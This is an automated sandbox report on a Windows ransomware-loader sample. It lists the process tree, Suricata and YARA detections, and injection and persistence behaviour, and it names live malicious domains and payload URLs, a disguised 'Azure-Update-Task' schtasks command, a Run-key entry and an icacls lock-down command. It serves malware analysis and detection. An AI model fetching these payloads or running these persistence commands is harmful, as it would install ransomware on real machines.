Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 26, 2024, 10:08 a.m.	June 26, 2024, 10:15 a.m.

Size	839.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`71b44c9a55f3b40681f6a5524ca9821d`
SHA256	`9cea3ad8914836b158f4a3494c1b3b3dadc93af4d9a560cbec22742302de5439`
CRC32	`FA108585`
ssdeep	`12288:oFLV3SQMC2KjSnCs/urQO4VivUI6q9ulGvxnrgJMKut3KENjEhQEOuV:iSQaCsgUI6grzt3K4EWlu`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
2584
- icacls.exe icacls "C:\Users\test22\AppData\Local\5b31f130-ec4a-43ad-82c9-3b3f7d683b80" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2684
build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
2896
- build3.exe "C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe"
  1680
  - build3.exe "C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe"
    2088
    - schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
      948

Name	Response	Post-Analysis Lookup
defgyma.com	A 190.146.112.188 A 186.145.236.93 A 210.182.29.70 A 201.191.99.134 A 213.172.74.157 A 190.159.138.51 A 200.122.37.247 A 109.175.29.39 A 186.137.126.27 A 211.181.24.132	190.159.138.51
cajgtus.com	A 190.249.196.63 A 201.119.80.250 A 183.100.39.16 A 148.230.249.9 A 189.195.132.134 A 78.89.199.216 A 189.232.122.29 A 211.181.24.132 A 181.52.122.51 A 93.118.137.82	189.195.132.134
api.2ip.ua	A 104.21.65.24 A 172.67.139.220	172.67.139.220

IP Address	Status	Action
104.21.65.24	Active	Moloch
164.124.101.2	Active	Moloch
201.191.99.134	Active	Moloch
93.118.137.82	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49172 -> 93.118.137.82:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 93.118.137.82:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 93.118.137.82:80 -> 192.168.56.103:49172	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 201.191.99.134:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 201.191.99.134:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 201.191.99.134:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 104.21.65.24:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 104.21.65.24:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 201.191.99.134:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49174 -> 93.118.137.82:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 93.118.137.82:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 93.118.137.82:80 -> 192.168.56.103:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49165 -> 104.21.65.24:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 104.21.65.24:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 104.21.65.24:443	C=US, O=Google Trust Services, CN=WE1	CN=2ip.ua	ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1
TLSv1 192.168.56.103:49165 104.21.65.24:443	C=US, O=Google Trust Services, CN=WE1	CN=2ip.ua	ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 26, 2024, 10:09 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2024, 10:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 26, 2024, 10:10 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 26, 2024, 10:10 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AFX_DIALOG_LAYOUT

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (4 events)

request	GET http://cajgtus.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
request	GET http://defgyma.com/dl/build2.exe
request	GET http://cajgtus.com/files/1/build3.exe
request	GET https://api.2ip.ua/geo.json

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 26, 2024, 10:10 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002dc000 process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory June 26, 2024, 10:10 a.m.	process_identifier: 1680 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0

Foreign language identified in PE resource (24 events)

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x023b3710

size

0x00000468

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x023b3b78

size

0x00000068

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x023b3b78

size

0x00000068

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x023b3b78

size

0x00000068

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build2.exe
file	C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build2.exe
file	C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 26, 2024, 10:10 a.m.	thread_identifier: 2040 thread_handle: 0x000000ac process_identifier: 948 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

An executable file was downloaded by the process build.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile June 26, 2024, 10:10 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $_á3e`e`e`7` e`7`e`7`0e`<£ô`e`e`re`7`e`7`e`7`e`Riche`PELÈò¶cà ´Z¹ª#Ð@À¹Ñì#(¸¥H@Ðp.textW³´ `.rdataL\Ð^¸@@.dataÈÒ´0D@À.rsrc¥¸¦Z@@UìVEPñè;Ç¼Ñ@Æ^]ÂÇ¼Ñ@éðUìVñÇ¼Ñ@èßöEtVèYÆ^]ÂUì}t(~r"FW8ÛvQWjPèùÄWèåY_ËÆÇFè]ÂUìVSW^úrëË¸4C;Èw3úrëË~y;ÈvúrëËÿuØ+ÙÑûVÆèTë4}ÆèÎÀt$Førh4CPSÇèÄÏÆèÆ_[]ÂxHr@ëÀ3ÒfHÃUìVðW9^sè~+û9}s}E;ÆujÿûðèS3ÿèëCèGÀt:~rFëFuVúrNëNXPRQÇèðÄÏÆèkÿÿÿE_^]ÂVðÿþÿÿvè¿F;ÇsÿvWVè ëÿu!~ørvëÆ3Àf3À;ÇÀ÷Ø^ÃUìQQ9~sèÆF+Ç;EsE}vSNSVùr]üëUüùr]+ÃÀPUøUüBPEø+ÏÉQxPè^NÄ+ËÆè¨þÿÿ[ÆÉÂj¸(Ã@è6u}Ïÿþÿÿv}ë'3ÒjÇ[÷óNMìÑmìUì;Âs¸þÿÿ+Â;Èw< eüOèEë$EHeðEìÆEüènE¸ô@Ãu}ì}v!~rFëFPGPÿuEèxÄj3Ûè"ýÿÿEMFÆ~èàýÿÿè²Âuj3ÛèûüÿÿSSèóÌUììÉw3É Pè0YÉÃÈÿ3Ò÷ñøsèjMôèyüÿÿhP#CEôPè¶ÌUìÀPÿuEÀPÿuè¾EÄ]ÃUìVÿuñè÷ Ç¼Ñ@Æ^]ÂÿUìÿuÿuÿuÿuèEÄ]ÃÿUìÿuÿuÿuÿuèÀEÄ]ÃÿUì}Vt+qAþrëÐ9UrþrIÈ;Mv°ë2À^]ÂÿUìMìÉw3ÉQè= YÉÃÈÿ3Ò÷ñøsëjMôèûÿÿhP#CEôPèÃÌÿUìÿuÿuÿuÿuè1ÿÿÿÄ]ÃÿUìÿuÿuÿuÿuè4ÿÿÿÄ]ÃÿUìyEArIëÁÆ]ÂÿUìjÿuè[ÿÿÿYY]ÂÿUìQÿuüÿuÿuÿuÿuèzÿÿÿÄÉÃÿUìQÿuüÿuÿuÿuÿuèvÿÿÿÄÉÃÿUì}Vñt)~r#}FW8vÿuWjPèÿÿÿÄWèø Y_ÿuÎÇFèDÿÿÿ^]Âj¸fÂ@è2ù}èuÎþþvuë%3ÒjÆ[÷óOMìÑmìUì;ÂsjþX+Â;Èw4 eüFPÏèÿÿÿØë)EMèE@eðPÆEüèðþÿÿEì¸ù@Ã}èu]ì}vrGëGÿuPFPSèÑþÿÿÄjjÏèÿÿÿÿuÏ_wè}þÿÿèÂMè3öVjèÜþÿÿVVèí ÌjjèËþÿÿÃj¸Â@èñuðèºÿueüNÇÈÑ@èÆèYÂy$rAÃAÃÿVñjjNÇÈÑ@èpþÿÿÎ^éLÿUìVñèÔÿÿÿöEtVè\| YÆ^]ÂÿUìVÿuñèmÿÿÿÇÔÑ@Æ^]ÂÇÔÑ@éÿÿÿÿUìVñÇÔÑ@èÿÿÿöEtVè- YÆ^]ÂÿUìVÿuñèÿÿÿÇàÑ@Æ^]ÂÇàÑ@éIÿÿÿÿUìVñÇàÑ@è6ÿÿÿöEtVèÞYÆ^]ÂjD¸¬Â@èõhèÑ@MØèeüEØPM°è9ÿÿÿh¸CE°PèÌÿUìVuþþvèµÿÿÿ9qsÿqVèýÿÿë(}tþsA;ðsÆPjè2ýÿÿë öuVè²üÿÿ3À;ÆÀ÷Ø^]ÂÿUìVW}WñèàûÿÿÀt~rFëFÿu+øWVÎè2ë:jÿuÎèhÿÿÿÀt(NùrFëFÿuWQPè\|üÿÿÄÿuÎè9üÿÿÆ_^]ÂÿUìVÿuñè"YPÿuÎèpÿÿÿ^]ÂÿUìVñjÇFèúûÿÿÿuÎè¿ÿÿÿÆ^]ÂjD¸ÏÂ@è©høÑ@MØèÀÿÿÿeüEØPM°è<þÿÿh<CE°Pè>ÌÿUìUVñN;Êsè±ÿÿÿ+Ê;MsM}vBFSW~ørëßør?+MÚ]QS+ÂPúWè°ûÿÿF+EÄPÎèJûÿÿ_[Æ^]ÂÿUìS]VW}Gñ;Ãsè<ÿÿÿ+ÃEE;EsE;÷uEjÿÃPèSÿÿÿSjÎèIÿÿÿëFjÿuèñýÿÿÀt8rëÇNùrFëFÿuûWQPèõúÿÿÄÿuÎè²úÿÿ_Æ^[]ÂÿUìVñjÇFèúÿÿjÿjÿuÎèDÿÿÿÆ^]Âj¸òÂ@è>ñuð}Wè_eüÇWNÇÈÑ@è¥ÿÿÿÆè\|ÂÿUìVÿuñè¶ÿÿÿÇÔÑ@Æ^]ÂÿUìVÿuñèÿÿÿÇàÑ@Æ^]Â; 0CuóÃéDÿUìEVW3ÿ;ÇtG9}uè6j^0WWWWWè¿ÄÆë)9}tà9Esèj"Yñë×PÿuÿuèøÄ3À_^]ÃÿUìEVñÆFÀucèó FHlHhN; 8Ct 47CHpuèF;86CtF 47CHpuèFFö@puHpÆFë @FÆ^]ÂÿUìì3ÉWø;ñt3Àf;Ùy9Mp8hÿuMðè?ÿÿÿEðxu.ötf¶fEÀtÇ request_handle: 0x00cc000c	1	1	0
InternetReadFile June 26, 2024, 10:10 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $6økrh8rh8rh8ÏÖþ8sh8lËý8nh8lËë8üh8U_8{h8ri8Éh8lËì82h8lËü8sh8lËù8sh8Richrh8PELÒ¹aà j; @À>°¿lhd>/0¸@¸.textrhj `.data¨ÿ:n@À.kic>\|@À.rsrc/>0~@@¶sssökl"l.lHlZlplll¬lÀlÐlìlþlm m4mBm^mtmm m°mÊmÜmömnn&n@n\nlnnn n¬n¼nÔnænönoo,o@oTo`opoooêkÂoØoêopp.p:pHpVpnppp¦p´pÎpÜpüpq,q@qPqbq~qq¨q¶qÎqÜqêq r"r2r>rPrbrxrrªr¾rÚrärss s4sLsÒk¦k´k¦okÜsäsüst&t:tNtjttt²t¾tÊtÜtìtüt uu$u:uDuRubunuuuªu¸uÊuÜuöuvv6vLvfv~vv®vÈvÖvävðvww&w2w>wNwXwdwpwwªwÀwÐwæwöwxxx<xHxVxdxnsp:C AÀA`A4B`TB@ÞA@;B@Cp ATcX¸¬bad allocationlubimipemoxiluyexuwilusimazovahoyipixefuliguhifedejowibifunepageyuveciwicabutecohopecadedohomosiseroxagogukisegopezehuyorosecexeyunolezamugocimidezoyobugalodolobuvelelezocokakufofafacajoxecesuvusunixanofuloxucepofalimetominibidoluzogudawulapabevotuwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexeyukuore lacohocojalikukkurikolisidudiguyikawu danijekernel32.dllì¸@§»@Ðç@ITERATOR LIST CORRUPTED!C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of range"("_Myptr + _Off <= ((_Myvec )(this->_Getmycont()))->_Mylast && _Myptr + _Off >= ((_Myvec )(this->_Getmycont()))->_Myfirst", 0)"invalid argument"std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vectorstd::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::alloca request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000a0c00', u'virtual_address': u'0x00014000', u'entropy': 7.720115696201179, u'name': u'.rdata', u'virtual_size': u'0x000a0a54'}

entropy

7.7201156962

description

A section with a high entropy has been found

entropy

0.766845557543

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://www.openssl.org/support/faq.html

Yara rule detected in process memory (50 events)

description	task schedule	rule	schtasks_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	[m] Generic Malware	rule	Generic_Malware_Zero_m
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 26, 2024, 10:10 a.m.	process_identifier: 2088 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\5b31f130-ec4a-43ad-82c9-3b3f7d683b80\build.exe" --AutoStart

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 26, 2024, 10:10 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2088 process_handle: 0x00000080	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1680 called NtSetContextThread to modify thread in remote process 2088
NtSetContextThread June 26, 2024, 10:10 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2088	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2584 resumed a thread in remote process 2736
Process injection	Process 1680 resumed a thread in remote process 2088
NtResumeThread June 26, 2024, 10:09 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2736	1	0	0
NtResumeThread June 26, 2024, 10:10 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2088	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\5b31f130-ec4a-43ad-82c9-3b3f7d683b80" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (12 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 26, 2024, 10:09 a.m.	thread_identifier: 2688 thread_handle: 0x000002fc process_identifier: 2684 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\5b31f130-ec4a-43ad-82c9-3b3f7d683b80" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000004f0	1	1
CreateProcessInternalW June 26, 2024, 10:09 a.m.	thread_identifier: 2740 thread_handle: 0x000002bc process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
NtResumeThread June 26, 2024, 10:09 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW June 26, 2024, 10:10 a.m.	thread_identifier: 1372 thread_handle: 0x000002bc process_identifier: 1680 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe" filepath_r: C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
CreateProcessInternalW June 26, 2024, 10:10 a.m.	thread_identifier: 2080 thread_handle: 0x0000007c process_identifier: 2088 current_directory: filepath: C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe" filepath_r: C:\Users\test22\AppData\Local\b22273b6-6a69-427a-a3b8-b10592be9460\build3.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread June 26, 2024, 10:10 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection June 26, 2024, 10:10 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2088 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory June 26, 2024, 10:10 a.m.	process_identifier: 2088 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory June 26, 2024, 10:10 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2088 process_handle: 0x00000080	1	1
NtSetContextThread June 26, 2024, 10:10 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2088	1	0
NtResumeThread June 26, 2024, 10:10 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2088	1	0
CreateProcessInternalW June 26, 2024, 10:10 a.m.	thread_identifier: 2040 thread_handle: 0x000000ac process_identifier: 948 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Strab.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Lockbit.cc
McAfee	Artemis!71B44C9A55F3
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
